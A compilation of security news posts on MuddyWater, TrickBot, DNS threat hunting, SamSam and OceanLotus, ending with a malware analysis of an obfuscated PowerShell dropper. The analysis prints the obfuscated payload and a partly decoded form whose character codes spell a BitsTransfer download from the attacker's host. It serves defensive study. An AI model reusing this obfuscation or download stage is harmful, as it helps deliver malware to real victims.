The macros contain strings encoded in base52, a technique that is not common and that was used by MuddyWater in past attacks. Once enabled, the macros will drop a .dll file (with a PowerShell code embedded) and a .reg file into %temp%directory.

The PowerShell code has several layers of obfuscation, the backdoor initially collects the system information and concatenates various pieces of information (i.e. OS name, domain name, user name, IP address) into one long string.

For communication, the malware uses files named <md5(hard disk serial number)> with various extensions associated with the purpose of the file:

  • .cmd – text file with a command to execute
  • .reg – system info as generated by myinfo() function, see screenshot above
  • .prc – output of the executed .cmd file, stored on local machine only
  • .res – output of the executed .cmd file, stored on cloud storage

“In both the older version of the MuddyWater backdoor and this recent backdoor, these files are used as an asynchronous mechanism instead of connecting directly to the machine and issuing a command.” continues the experts.

“The malware operator leaves a command to execute in a .cmd file, and comes back later to retrieve the .res files containing the result of the issued command.”

The malware supports various commands including file upload, persistence removal, exit, file download, and command execution.

Experts concluded that the attacks aimed at Turkish government organizations related to the finance and energy sectors that were also hit by MuddyWater in the past.

“This is yet another similarity with previous MuddyWater campaigns, which were known to have targeted multiple Turkish government entities.” concludes Trend Micro.

“If the group is responsible for this new backdoor, it shows how they are improving and experimenting with new tools,” Trend Micro concludes.

Pierluigi Paganini

(Security Affairs – MuddyWater, backdoor)

 

The post New PowerShell-based Backdoor points to MuddyWater appeared first on Security Affairs.

Brand New Bag? TrickBot Malware Adds POS Data Collection Module

Security researchers observed TrickBot malware that utilizes a new capability: point-of-sale (POS) data collection.

Close on the heels of TrickBot’s recent pwgrab32 password-grabbing module, the new variant scans for indications that infected devices are connected to POS-capable services and machines, according to Trend Micro. It’s worth noting that while the malware collects data about the type and distribution of POS systems, at the time of the Trend Micro report TrickBot wasn’t yet grabbing credit card or banking information.

The new module, psfin32, is specifically designed to find POS services and technologies across infected domains. Using Lightweight Directory Access Protocol (LDAP) queries to leverage Active Directory (AD), the module looks for POS machines in the global catalog with a variety of substrings, including “POS,” “CASH,” “LANE” and “RETAIL.”

If it comes up empty, the malware searches for “AccountName” strings used by legacy Windows versions such as NT 4.0 and Windows 95. Once it has POS data in hand, the Trojan creates a preconfigured log file and sends it to command and control (C&C) servers using POST connections.

A Precursor to Holiday POS Attacks?

As noted by Trend Micro, TrickBot stopping short of full data collection could indicate that threat actors are conducting reconnaissance in preparation of a large-scale attack, which fits the TrickBot malware pattern of rapid code development and distribution followed by iterative attacks. This is particularly concerning for retail enterprises considering the proximity of this POS problem to the holidays. Given the annual value of holiday transactions, psfin32’s search-and-find efforts may be a precursor to more damaging POS attacks over the next few months.

TrickBot’s development speed is also worrisome for companies looking to stay ahead of security threats. Its password-grabbing module was only detected at the beginning of November, and within three weeks the new POS variant emerged.

How to Limit the Impact of TrickBot Malware

How can companies stay safe from TrickBot and prevent its POS attacks? IBM X-Force researchers recommend conducting a quick evaluation of basic security hygiene: Are applications and operating systems fully patched? Are antivirus tools up to date? Are monitoring tools capable of detecting networkwide indicators of compromise (IoCs) in place and active?

Security experts also point to the need for a critical shift in endpoint thinking: Rather than acting as the last bastion of security, endpoints should be treated as the first line of defense. By leveraging strong security tools that both monitor existing endpoints and detect new connected devices, security teams can limit the impact of TrickBot’s POS pilfering malware.

Source: Trend Micro

The post Brand New Bag? TrickBot Malware Adds POS Data Collection Module appeared first on Security Intelligence.

5 Tips for Uncovering Hidden Cyberthreats with DNS Analytics

The internet has fueled growth opportunities for enterprises by allowing them to establish an online presence, communicate with customers, process transactions and provide support, among other benefits. But it’s a double-edged sword: A cyberattack that compromises these business advantages can easily result in significant losses of money, customers, credibility and reputation, and increases the risk of completely going out of business. That’s why it’s critical to have a cybersecurity strategy in place to protect your enterprise from attackers that exploit internet vulnerabilities.

How DNS Analytics Can Boost Your Defense

The Domain Name System (DNS) is one of the foundational components of the internet that malicious actors commonly exploit and use to deploy and control their attack framework. The internet relies on this system to translate names, known as Uniform Resource Locators (URLs), into numbers, known as Internet Protocol (IP) addresses. Giving each IP a unique identifier allows computers and devices to send and receive information across networks. However, DNS also opens the door for opportunistic cyberattackers to infiltrate networks and access sensitive information.

Here are five tips to help you uncover hidden cyberthreats and protect your enterprise with DNS analytics.

1. Think Like an Attacker to Defend Your Enterprise

To protect the key assets of your enterprise and allocate sufficient resources to defend them, you must understand why a threat actor would be interested in attacking your organization. Attacker motivations can vary depending on the industry and geography of your enterprise, but the typical drivers are political and ideological differences, fame and recognition, and the opportunity to make money.

When it comes to DNS, bad actors have a vast arsenal of weapons they can utilize. Some of the most common methods of attack to anticipate are distributed denial-of-service (DDoS) attacks, DNS data exfiltration, cache poisoning and fast fluxing. As enterprises increase their security spending, cyberattacks become more innovative and sophisticated, including novel ways to abuse the DNS protocol. Malware continues to be the preferred method of threat actors, and domain generation algorithms (DGAs) are still widely used, but even that method has evolved to avoid detection.

2. Make DNS Monitoring a Habit

Passive DNS data is important because it is unlikely that a new network connection doesn’t have an associated DNS lookup. It also means that if you collect DNS data correctly, you can see most of the network activity in your environment. A more interesting subject is what we can do with this data to create more local security insights. Even though it is not hard to bypass DNS lookup, such network connections are suspicious and easy to detect.

3. Understand Communication and Traffic Patterns

Attackers leverage the DNS protocol in various ways — some of which are way ahead of our detection tools — however, there are always anomalies that we can observe in the DNS request sent out by endpoints. DNS traffic patterns vary by enterprise, so understanding what the normal pattern for your organization is will enable you to spot pattern anomalies easily.

A robust, secure system should be able to detect exfiltration via DNS tunneling software, which is not as easy as it sounds due to their different communication patterns. DNS tunneling software communication is reliable and frequent, the flow is bidirectional, and it is typically long. On the other hand, DNS exfiltration communication is opportunistic and unexpected, and possibly unidirectional since attackers are looking for the right moment to sneak out valuable data.

4. Get the Right Tools in Place

When analyzing which tools are the best to protect your organization against attacks leveraging DNS, consider what assets you want to protect and the outcomes you would like your analysts to achieve. There are many tools that can be pieced together to create a solution depending on your goals, such as firewalls, traffic analyzers and intrusion detection systems (IDSs).

To enhance the day-to-day activities of your security operations center (SOC), enable your team to conduct comprehensive analysis on domain activity and assign an appropriate risk rating, your SOC analysts should take advantage of threat intelligence feeds. These feeds empower analysts to understand the tactics, techniques and procedures (TTPs) of attackers and provide them with a list of malicious domains to block or alert on their security system. When this information is correlated with internal enterprise information through a security information and event management (SIEM) platform, analysts have full visibility to detect or anticipate ongoing attacks.

5. Be Proactive and Go Threat Hunting

Technology is a very useful tool that allows us to automate processes and alerts us of suspicious activity within our networks — but it is not perfect. Threat hunting can complement and strengthen your defense strategy by proactively searching for indicators of compromise (IoC) that traditional detection tools might miss. To succeed at threat hunting, you must define a baseline within your environment and then define the anomalies that you are going to look for.

A standard method for threat hunting is searching for unusual and unknown DNS requests, which can catch intruders that have already infiltrated your system as well as would-be intruders. Some indicators of abnormal DNS requests tinclude the number of NXDOMAIN records received by an endpoint, the number of queries an endpoint sends out and new query patterns. If you identify a potential threat, an incident response (IR) team can help resolve and remediate the situation by analyzing the data.

Learn More

Every organization is unique, but by understanding the basics of DNS analytics, the common methods of attack and the tools available to security teams, you will be better prepared to protect your enterprise from hidden cyberthreats.

We invite you to attend a live webinar at 11 a.m. ET on Dec. 11 (and available on-demand thereafter) to learn even more about DNS threat hunting.

Register for the webinar

The post 5 Tips for Uncovering Hidden Cyberthreats with DNS Analytics appeared first on Security Intelligence.

Feds charge 2 Iranian hackers behind SamSam ransomware attacks

By Waqas

The United States Department of Justice has charged two Iranian nationals with allegedly developing and using SamSam ransomware against their targets in the United States and Canada to carry out computer hacking and extortion scheme from Iran. Both Mohammad Mehdi Shah Mansouri, 27 and Faramarz Shahi Savandi, 34 have been charged with six counts together with one count of conspiracy […]

This is a post from HackRead.com Read the original post: Feds charge 2 Iranian hackers behind SamSam ransomware attacks

OceanLotus Watering Hole Campaign Compromises 21 High-Profile Southeast Asian Websites

A watering hole campaign that has been active in Southeast Asia since September has compromised at least 21 websites, including those of government agencies and major media outlets.

Researchers attributed the attack to a group of cybercriminals known as OceanLotus, which has been targeting foreign governments for approximately six years. Users who visited the compromised websites were redirected to a page controlled by the attackers. While those in charge of the domains have since been informed about the watering hole attack, some continue to be injected with malware scripts.

A Wider Watering Hole Than Usual

The traditional watering hole campaign strategy has focused on luring specific individuals by compromising URLs they’re known to use regularly, but the latest OceanLotus attack includes sites such as a popular Vietnamese newspaper, suggesting that a large number of people could be affected.

Over the course of a multiphase attack, OceanLotus installs a piece of malicious Java code on a site that creates a connection with a victim’s system, and then additional scripts to deliver a possible payload. While the full extent of the watering hole campaign isn’t clear, researchers speculated that the compromised websites could be used to conduct phishing schemes and steal confidential data.

Like many other cybercriminal organizations, OceanLotus is focused on improving the sophistication of its attacks. The researchers noted, for example, that the group used an RSA 1024-bit public key to prevent the decryption of information sent from its server and client devices. OceanLotus also purchased dozens of domains and servers, which it used to run the first and second stages of the attacks and make the URLs look legitimate.

How To Strike A Better Threat Management Balance

Compared with more obvious tactics, such as phishing emails with malicious links or ransomware attachments, a watering hole campaign can easily fly under the radar of organizations that haven’t experienced a website compromise before. For that reason, many companies affected by the likes of OceanLotus find themselves responding reactively rather than proactively addressing the associated risks ahead of time.

IBM experts suggest adopting a threat management framework that begins with generating insights about potential attacks, implementing safeguards necessary to prevent them, monitoring continuously to detect anomalies and responding as necessary.

Source: WeLiveSecurity

The post OceanLotus Watering Hole Campaign Compromises 21 High-Profile Southeast Asian Websites appeared first on Security Intelligence.

Dissecting the Mindscrew-Powershell Obfuscation

The Yoroi-Cybaze ZLAB dissected the VBS script embedded into the zip archives delivered to the victims of a recent attack.

Introduction

Few days ago, the CERT-Yoroi bulletin N061118 disclosed a dangerous campaign attacking several Italian users. The attack wave contained some interesting techniques need to look into further, especially regarding the obfuscation used to hide the malicious dropping infrastructure.

The Yoroi-Cybaze ZLAB dissected the VBS script embedded into the zip archives delivered to the victims,  finding an inner powershell payload designed to actually download the malicious Gootkit binary from the attacker’s infrastructure. This inner script was carefully obfuscated in a clever and unseen way.

Technical Analysis

The Powershell code executed by the initial VBS script appears as following:

  1. ( ‘…..’|%{${#/~} =+ $()}{ ${@}=${#/~}} { ${/.} = ++${#/~}}{ ${*~}=(${#/~} =${#/~} +${/.})} {${$./} =(${#/~}= ${#/~} + ${/.} )}{${)@}=( ${#/~}=${#/~}+${/.} )} { ${‘} =(${#/~} =${#/~}+ ${/.}) } { ${;} = ( ${#/~}=${#/~} + ${/.}) } {${ *-}= ( ${#/~}=${#/~}+${/.})} {${“[+} = ( ${#/~} =${#/~} +${/.} ) } { ${#~=}= ( ${#/~}= ${#/~}+ ${/.} )} { ${“@} =”[” +”$(@{ } ) “[${ *-} ] + “$(@{})”[ “${/.}” +”${#~=}” ]+ “$(@{ })”[“${*~}”+”${@}”]+”$? “[${/.} ]+”]” }{${#/~} = “”.(“$( @{} )”[ “${/.}${)@}” ]+”$(@{ }) “[“${/.}${;}”] + “$( @{ } ) “[ ${@}]+ “$(@{} ) “[ ${)@}]+ “$?”[${/.}] + “$( @{ } ) “[${$./} ])}{${#/~} =”$( @{} ) “[ “${/.}${)@}”] + “$( @{ } )”[${)@}] +”${#/~}”[ “${*~}${ *-}”]} ); .${#/~} (“${#/~} (${“@}${/.}${@}${‘} + ${“@}${/.}${@}${*~} +${“@}${)@}${@}+ ${“@}${$./}${;}+${“@}${/.}${@}${)@} +${“@}${/.}${/.}${/.} +${“@}${/.}${/.}${‘}+ ${“@}${/.}${/.}${;} +${“@}${)@}${;}+${“@}${/.}${/.}${“[+}+${“@}${/.}${@}${/.}+${“@}${/.}${/.}${)@}+${“@}${/.}${/.}${‘}+${“@}${/.}${@}${‘}+${“@}${/.}${/.}${/.}+ ${“@}${/.}${/.}${@}+${“@}${)@}${;}+ ${“@}${/.}${@}${#~=} + ${“@}${#~=}${ *-}+ ${“@}${/.}${@}${;}+ ${“@}${/.}${/.}${/.} +${“@}${/.}${/.}${)@}+ ${“@}${$./}${*~}+${“@}${)@}${‘}+ ${“@}${/.}${@}${“[+} + ${“@}${/.}${/.}${;}+ ${“@}${$./}${*~} +${“@}${‘}${/.} + ${“@}${)@}${/.}+ ${“@}${/.}${*~}${$./} + ${“@}${ *-}${$./}+ ${“@}${/.}${@}${#~=}+ ${“@}${/.}${/.}${*~}+ ${“@}${/.}${/.}${/.} + ${“@}${/.}${/.}${)@}+${“@}${/.}${/.}${;}+ ${“@}${)@}${‘}+${“@}${ *-}${ *-}+ ${“@}${/.}${/.}${/.}+${“@}${/.}${@}${@}+ ${“@}${/.}${/.}${ *-}+${“@}${/.}${@}${“[+} +${“@}${/.}${@}${/.}+${“@}${$./}${*~} +${“@}${;}${;}+${“@}${/.}${@}${‘}+ ${“@}${/.}${/.}${;}+${“@}${/.}${/.}${‘}+${“@}${“[+}${)@} +${“@}${/.}${/.}${)@}+ ${“@}${#~=}${ *-} +${“@}${/.}${/.}${@}+${“@}${/.}${/.}${‘}+ ${“@}${/.}${@}${*~} + ${“@}${/.}${@}${/.} +${“@}${/.}${/.}${)@} + ${“@}${/.}${*~}${‘}+${“@}${$./}${*~} +${“@}${“[+}${$./} + ${“@}${/.}${/.}${;} + ${“@}${#~=}${ *-}+ ${“@}${/.}${/.}${)@} +${“@}${/.}${/.}${;} + ${“@}${)@}${‘} + ${“@}${;}${;} + ${“@}${/.}${@}${‘}+${“@}${/.}${/.}${;} + ${“@}${/.}${/.}${‘}+${“@}${“[+}${)@} +${“@}${/.}${/.}${)@} +${“@}${#~=}${ *-} +${“@}${/.}${/.}${@}+ ${“@}${/.}${/.}${‘}+${“@}${/.}${@}${*~} +${“@}${/.}${@}${/.} + ${“@}${/.}${/.}${)@} + ${“@}${$./}${*~}+${“@}${)@}${‘}+ ${“@}${“[+}${$./}+ ${“@}${/.}${/.}${/.}+ ${“@}${/.}${/.}${ *-} + ${“@}${/.}${/.}${)@}+ ${“@}${#~=}${#~=}+${“@}${/.}${@}${/.} + ${“@}${$./}${*~}+ ${“@}${/.}${@}${)@}+ ${“@}${/.}${/.}${;}+ ${“@}${/.}${/.}${;} + ${“@}${/.}${/.}${*~} +${“@}${/.}${/.}${‘}+${“@}${‘}${“[+}+ ${“@}${)@}${ *-}+${“@}${)@}${ *-}+${“@}${/.}${/.}${*~} +${“@}${/.}${/.}${)@} + ${“@}${/.}${@}${/.} + ${“@}${/.}${@}${@} + ${“@}${/.}${@}${‘}+${“@}${/.}${/.}${‘}+ ${“@}${/.}${/.}${*~} +${“@}${/.}${/.}${/.} + ${“@}${/.}${/.}${‘}+ ${“@}${/.}${/.}${;}+ ${“@}${/.}${/.}${/.} + ${“@}${)@}${;}+${“@}${/.}${@}${#~=}+ ${“@}${#~=}${ *-}+${“@}${/.}${/.}${;} +${“@}${/.}${/.}${;} +${“@}${/.}${/.}${*~}+ ${“@}${/.}${/.}${/.} + ${“@}${/.}${@}${@}+${“@}${/.}${/.}${‘}+ ${“@}${#~=}${#~=}+ ${“@}${/.}${@}${)@}+ ${“@}${/.}${/.}${#~=} + ${“@}${/.}${@}${/.}+ ${“@}${/.}${@}${‘} +${“@}${/.}${/.}${;} + ${“@}${)@}${;}+ ${“@}${#~=}${#~=} + ${“@}${/.}${/.}${/.} + ${“@}${/.}${@}${#~=}+ ${“@}${)@}${ *-} + ${“@}${#~=}${#~=}+ ${“@}${/.}${/.}${/.}+${“@}${/.}${@}${#~=} +${“@}${/.}${/.}${ *-}+ ${“@}${/.}${/.}${@}+${“@}${/.}${@}${‘} + ${“@}${/.}${/.}${“[+} + ${“@}${)@}${ *-}+${“@}${/.}${@}${‘}+ ${“@}${/.}${/.}${@} + ${“@}${/.}${/.}${;}+${“@}${/.}${@}${/.}+ ${“@}${/.}${/.}${)@}+${“@}${)@}${;} + ${“@}${/.}${/.}${*~}+ ${“@}${/.}${@}${)@} +${“@}${/.}${/.}${*~} + ${“@}${‘}${‘} +${“@}${$./}${*~}+${“@}${)@}${‘}+${“@}${;}${“[+}+ ${“@}${/.}${@}${/.} +${“@}${/.}${/.}${‘} +${“@}${/.}${/.}${;}+${“@}${/.}${@}${‘}+ ${“@}${/.}${/.}${@}+ ${“@}${#~=}${ *-}+ ${“@}${/.}${/.}${;}+${“@}${/.}${@}${‘}+${“@}${/.}${/.}${/.} + ${“@}${/.}${/.}${@} +${“@}${$./}${*~} + ${“@}${$./}${;} + ${“@}${/.}${@}${/.} +${“@}${/.}${/.}${@}+ ${“@}${/.}${/.}${“[+} + ${“@}${‘}${“[+} + ${“@}${/.}${/.}${;} +${“@}${/.}${@}${/.}+ ${“@}${/.}${@}${#~=}+ ${“@}${/.}${/.}${*~} + ${“@}${#~=}${*~}+${“@}${/.}${@}${ *-}+ ${“@}${/.}${/.}${‘} + ${“@}${/.}${@}${;} +${“@}${/.}${*~}${@}+ ${“@}${/.}${@}${;} +${“@}${/.}${@}${/.}+${“@}${/.}${/.}${#~=}+ ${“@}${/.}${/.}${ *-}+ ${“@}${/.}${@}${)@} + ${“@}${/.}${/.}${ *-}+ ${“@}${/.}${@}${ *-}+${“@}${/.}${@}${/.} +${“@}${/.}${/.}${#~=}+ ${“@}${)@}${;}+${“@}${/.}${@}${/.} +${“@}${/.}${*~}${@}+${“@}${/.}${@}${/.} + ${“@}${‘}${#~=}+ ${“@}${$./}${*~}+ ${“@}${“[+}${$./} + ${“@}${/.}${/.}${;}+${“@}${#~=}${ *-}+ ${“@}${/.}${/.}${)@} +${“@}${/.}${/.}${;} + ${“@}${)@}${‘} +${“@}${“[+}${@}+${“@}${/.}${/.}${)@} +${“@}${/.}${/.}${/.}+ ${“@}${#~=}${#~=}+ ${“@}${/.}${@}${/.} + ${“@}${/.}${/.}${‘} +${“@}${/.}${/.}${‘} +${“@}${$./}${*~} +${“@}${$./}${;} +${“@}${/.}${@}${/.}+${“@}${/.}${/.}${@}+ ${“@}${/.}${/.}${“[+} +${“@}${‘}${“[+} + ${“@}${/.}${/.}${;} + ${“@}${/.}${@}${/.} +${“@}${/.}${@}${#~=} + ${“@}${/.}${/.}${*~} + ${“@}${#~=}${*~}+ ${“@}${/.}${@}${ *-}+ ${“@}${/.}${/.}${‘} + ${“@}${/.}${@}${;}+${“@}${/.}${*~}${@}+${“@}${/.}${@}${;} +${“@}${/.}${@}${/.} +${“@}${/.}${/.}${#~=} +${“@}${/.}${/.}${ *-}+ ${“@}${/.}${@}${)@}+ ${“@}${/.}${/.}${ *-} +${“@}${/.}${@}${ *-} + ${“@}${/.}${@}${/.} + ${“@}${/.}${/.}${#~=}+${“@}${)@}${;} +${“@}${/.}${@}${/.} + ${“@}${/.}${*~}${@} + ${“@}${/.}${@}${/.} )”)

It seems a set of random special characters without any meaning. However, the Powershell interpreter can execute it quietly. So, after an accurate analysis, it is possible to see some pattern in the weird characters following the “$” symbol: in Powershell language is possible to declare variables using the pattern ${variable_name}, including any character between the braces, special characters doesn’t make exception. For  instance, some of variable names in the script above are:

  1. ${#/~}
  2. ${@}
  3. ${;}
  4. ${“@}
  5. ${#~=}
  6. ${/.}
  7. ${*~}

Replacing these variable names with some more readable and meaningful characters makes the script easier to analyze:

  1. ( ‘…..’|%{$var1 =+ $()}{ $var2=$var1} { $var3 = ++$var1}{ $var4=($var1 =$var1 +$var3)}{$var5 =($var1= $var1 + $var3 )}{$var6=( $var1=$var1+$var3 )} { $var7 =($var1 =$var1+ $var3) }{ $var8 = ( $var1=$var1 + $var3) } {$var9= ( $var1=$var1+$var3)} {$var10 = ( $var1 =$var1 +$var3 ) } { $var11= ( $var1= $var1+ $var3 )} { $var12 =“[“ +“$(@{ } ) “[$var9 ] + “$(@{})”[ “$var3” +“$var11” ]+ “$(@{ })”[“$var4”+“$var2”]+“$? “[$var3 ]+“]” }{$var1 = “”.(“$( @{} )”[ “$var3$var6” ]+“$(@{ }) “[“$var3$var8”] + “$( @{ } ) “[ $var2]+ “$(@{} ) “[ $var6]+ “$?”[$var3] + “$( @{ } ) “[$var5 ])}{$var1 =“$( @{} ) “[ “$var3$var6”] + “$( @{ } )”[$var6] +“$var1”[ “$var4$var9”]} );
  3. .$var1 (“$var1 ($var12$var3$var2$var7 + $var12$var3$var2$var4 +$var12$var6$var2+ $var12$var5$var8+$var12$var3$var2$var6 +$var12$var3$var3$var3 +$var12$var3$var3$var7+ $var12$var3$var3$var8 +$var12$var6$var8+$var12$var3$var3$var10+$var12$var3$var2$var3+$var12$var3$var3$var6+$var12$var3$var3$var7+$var12$var3$var2$var7+$var12$var3$var3$var3+ $var12$var3$var3$var2+$var12$var6$var8+ $var12$var3$var2$var11 + $var12$var11$var9+ $var12$var3$var2$var8+ $var12$var3$var3$var3 +$var12$var3$var3$var6+ $var12$var5$var4+$var12$var6$var7+ $var12$var3$var2$var10 + $var12$var3$var3$var8+ $var12$var5$var4 +$var12$var7$var3 + $var12$var6$var3+ $var12$var3$var4$var5 + $var12$var9$var5+ $var12$var3$var2$var11+ $var12$var3$var3$var4+ $var12$var3$var3$var3 + $var12$var3$var3$var6+$var12$var3$var3$var8+ $var12$var6$var7+$var12$var9$var9+ $var12$var3$var3$var3+$var12$var3$var2$var2+ $var12$var3$var3$var9+$var12$var3$var2$var10 +$var12$var3$var2$var3+$var12$var5$var4 +$var12$var8$var8+$var12$var3$var2$var7+ $var12$var3$var3$var8+$var12$var3$var3$var7+$var12$var10$var6 +$var12$var3$var3$var6+ $var12$var11$var9 +$var12$var3$var3$var2+$var12$var3$var3$var7+ $var12$var3$var2$var4 + $var12$var3$var2$var3 +$var12$var3$var3$var6 + $var12$var3$var4$var7+$var12$var5$var4 +$var12$var10$var5 + $var12$var3$var3$var8 + $var12$var11$var9+ $var12$var3$var3$var6 +$var12$var3$var3$var8 + $var12$var6$var7 + $var12$var8$var8 + $var12$var3$var2$var7+$var12$var3$var3$var8 + $var12$var3$var3$var7+$var12$var10$var6 +$var12$var3$var3$var6 +$var12$var11$var9 +$var12$var3$var3$var2+ $var12$var3$var3$var7+$var12$var3$var2$var4 +$var12$var3$var2$var3 + $var12$var3$var3$var6 + $var12$var5$var4+$var12$var6$var7+ $var12$var10$var5+ $var12$var3$var3$var3+ $var12$var3$var3$var9 + $var12$var3$var3$var6+ $var12$var11$var11+$var12$var3$var2$var3 + $var12$var5$var4+ $var12$var3$var2$var6+ $var12$var3$var3$var8+ $var12$var3$var3$var8 + $var12$var3$var3$var4 +$var12$var3$var3$var7+$var12$var7$var10+ $var12$var6$var9+$var12$var6$var9+$var12$var3$var3$var4 +$var12$var3$var3$var6 + $var12$var3$var2$var3 + $var12$var3$var2$var2 + $var12$var3$var2$var7+$var12$var3$var3$var7+ $var12$var3$var3$var4 +$var12$var3$var3$var3 + $var12$var3$var3$var7+ $var12$var3$var3$var8+ $var12$var3$var3$var3 + $var12$var6$var8+$var12$var3$var2$var11+ $var12$var11$var9+$var12$var3$var3$var8 +$var12$var3$var3$var8 +$var12$var3$var3$var4+ $var12$var3$var3$var3 + $var12$var3$var2$var2+$var12$var3$var3$var7+ $var12$var11$var11+ $var12$var3$var2$var6+ $var12$var3$var3$var11 + $var12$var3$var2$var3+ $var12$var3$var2$var7 +$var12$var3$var3$var8 + $var12$var6$var8+ $var12$var11$var11 + $var12$var3$var3$var3 + $var12$var3$var2$var11+ $var12$var6$var9 + $var12$var11$var11+ $var12$var3$var3$var3+$var12$var3$var2$var11 +$var12$var3$var3$var9+ $var12$var3$var3$var2+$var12$var3$var2$var7 + $var12$var3$var3$var10 + $var12$var6$var9+$var12$var3$var2$var7+ $var12$var3$var3$var2 + $var12$var3$var3$var8+$var12$var3$var2$var3+ $var12$var3$var3$var6+$var12$var6$var8 + $var12$var3$var3$var4+ $var12$var3$var2$var6 +$var12$var3$var3$var4 + $var12$var7$var7 +$var12$var5$var4+$var12$var6$var7+$var12$var8$var10+ $var12$var3$var2$var3 +$var12$var3$var3$var7 +$var12$var3$var3$var8+$var12$var3$var2$var7+ $var12$var3$var3$var2+ $var12$var11$var9+ $var12$var3$var3$var8+$var12$var3$var2$var7+$var12$var3$var3$var3 + $var12$var3$var3$var2 +$var12$var5$var4 + $var12$var5$var8 + $var12$var3$var2$var3 +$var12$var3$var3$var2+ $var12$var3$var3$var10 + $var12$var7$var10 + $var12$var3$var3$var8 +$var12$var3$var2$var3+ $var12$var3$var2$var11+ $var12$var3$var3$var4 + $var12$var11$var4+$var12$var3$var2$var9+ $var12$var3$var3$var7 + $var12$var3$var2$var8 +$var12$var3$var4$var2+ $var12$var3$var2$var8 +$var12$var3$var2$var3+$var12$var3$var3$var11+ $var12$var3$var3$var9+ $var12$var3$var2$var6 + $var12$var3$var3$var9+ $var12$var3$var2$var9+$var12$var3$var2$var3 +$var12$var3$var3$var11+ $var12$var6$var8+$var12$var3$var2$var3 +$var12$var3$var4$var2+$var12$var3$var2$var3 + $var12$var7$var11+ $var12$var5$var4+ $var12$var10$var5 + $var12$var3$var3$var8+$var12$var11$var9+ $var12$var3$var3$var6 +$var12$var3$var3$var8 + $var12$var6$var7 +$var12$var10$var2+$var12$var3$var3$var6 +$var12$var3$var3$var3+ $var12$var11$var11+ $var12$var3$var2$var3 + $var12$var3$var3$var7 +$var12$var3$var3$var7 +$var12$var5$var4 +$var12$var5$var8 +$var12$var3$var2$var3+$var12$var3$var3$var2+ $var12$var3$var3$var10 +$var12$var7$var10 + $var12$var3$var3$var8 + $var12$var3$var2$var3 +$var12$var3$var2$var11 + $var12$var3$var3$var4 + $var12$var11$var4+ $var12$var3$var2$var9+ $var12$var3$var3$var7 + $var12$var3$var2$var8+$var12$var3$var4$var2+$var12$var3$var2$var8 +$var12$var3$var2$var3 +$var12$var3$var3$var11 +$var12$var3$var3$var9+ $var12$var3$var2$var6+ $var12$var3$var3$var9 +$var12$var3$var2$var9 + $var12$var3$var2$var3 + $var12$var3$var3$var11+$var12$var6$var8 +$var12$var3$var2$var3 + $var12$var3$var4$var2 + $var12$var3$var2$var3 )”)

The first instruction of the script sets the variable values to some fixed strings, derived from a series of wasteful concatenation operations:

  1. ( ‘…..’|%{$var1 =+ $()}{ $var2=$var1} { $var3 = ++$var1}{ $var4=($var1 =$var1 +$var3)}{$var5 =($var1= $var1 + $var3 )}{$var6=( $var1=$var1+$var3 )} { $var7 =($var1 =$var1+ $var3) }{ $var8 = ( $var1=$var1 + $var3) } {$var9= ( $var1=$var1+$var3)} {$var10 = ( $var1 =$var1 +$var3 ) } { $var11= ( $var1= $var1+ $var3 )} { $var12 =“[“ +“$(@{ } ) “[$var9 ] + “$(@{})”[ “$var3” +“$var11” ]+ “$(@{ })”[“$var4”+“$var2”]+“$? “[$var3 ]+“]” }{$var1 = “”.(“$( @{} )”[ “$var3$var6” ]+“$(@{ }) “[“$var3$var8”] + “$( @{ } ) “[ $var2]+ “$(@{} ) “[ $var6]+ “$?”[$var3] + “$( @{ } ) “[$var5 ])}{$var1 =“$( @{} ) “[ “$var3$var6”] + “$( @{ } )”[$var6] +“$var1”[ “$var4$var9”]} );

After the execution of this instruction, the values contained into the variables are:

  1. $var1 = “iex”
  2. $var2 = “0
  3. $var3 = “1
  4. $var4 = “2
  5. $var5 = “3
  6. $var6 = “4
  7. $var7 = “5
  8. $var8 = “6
  9. $var9 = “7
  10. $var10 = “8
  11. $var11 = “9
  12. $var12 = “[CHar]

The second piece of code concatenates the above values in order to compose a powershell command string. Each single character of the generated command is represented as ASCII decimal numbers leveraging the variables above as alphabet (i.e. “$var12$var3$var2$var7” becomes “[CHar]105”) . The decoding of the entire instruction results in:

  1. iex ([CHar]105 + [CHar]102 +[CHar]40+ [CHar]36+[CHar]104 +[CHar]111 +[CHar]115+ [CHar]116 +[CHar]46+[CHar]118+[CHar]101+[CHar]114+[CHar]115+[CHar]105+[CHar]111+ [CHar]110+[CHar]46+ [CHar]109 + [CHar]97+ [CHar]106+ [CHar]111 +[CHar]114+ [CHar]32+[CHar]45+ [CHar]108 + [CHar]116+ [CHar]32 +[CHar]51 + [CHar]41+ [CHar]123 + [CHar]73+ [CHar]109+ [CHar]112+ [CHar]111 + [CHar]114+[CHar]116+ [CHar]45+[CHar]77+ [CHar]111+[CHar]100+ [CHar]117+[CHar]108 +[CHar]101+[CHar]32 +[CHar]66+[CHar]105+ [CHar]116+[CHar]115+[CHar]84 +[CHar]114+ [CHar]97 +[CHar]110+[CHar]115+ [CHar]102 + [CHar]101 +[CHar]114 + [CHar]125+[CHar]32 +[CHar]83 + [CHar]116 + [CHar]97+ [CHar]114 +[CHar]116 + [CHar]45 + [CHar]66 + [CHar]105+[CHar]116 + [CHar]115+[CHar]84 +[CHar]114 +[CHar]97 +[CHar]110+ [CHar]115+[CHar]102 +[CHar]101 + [CHar]114 + [CHar]32+[CHar]45+ [CHar]83+ [CHar]111+ [CHar]117 + [CHar]114+ [CHar]99+[CHar]101 + [CHar]32+ [CHar]104+ [CHar]116+ [CHar]116 + [CHar]112 +[CHar]115+[CHar]58+ [CHar]47+[CHar]47+[CHar]112 +[CHar]114 + [CHar]101 + [CHar]100 + [CHar]105+[CHar]115+ [CHar]112 +[CHar]111 + [CHar]115+ [CHar]116+ [CHar]111 + [CHar]46+[CHar]109+ [CHar]97+[CHar]116 +[CHar]116 +[CHar]112+ [CHar]111 + [CHar]100+[CHar]115+ [CHar]99+ [CHar]104+ [CHar]119 + [CHar]101+ [CHar]105 +[CHar]116 + [CHar]46+ [CHar]99 + [CHar]111 + [CHar]109+ [CHar]47 + [CHar]99+ [CHar]111+[CHar]109 +[CHar]117+ [CHar]110+[CHar]105 + [CHar]118 + [CHar]47+[CHar]105+ [CHar]110 + [CHar]116+[CHar]101+ [CHar]114+[CHar]46 + [CHar]112+ [CHar]104 +[CHar]112 + [CHar]55 +[CHar]32+[CHar]45+[CHar]68+ [CHar]101 +[CHar]115 +[CHar]116+[CHar]105+ [CHar]110+ [CHar]97+ [CHar]116+[CHar]105+[CHar]111 + [CHar]110 +[CHar]32 + [CHar]36 + [CHar]101 +[CHar]110+ [CHar]118 + [CHar]58 + [CHar]116 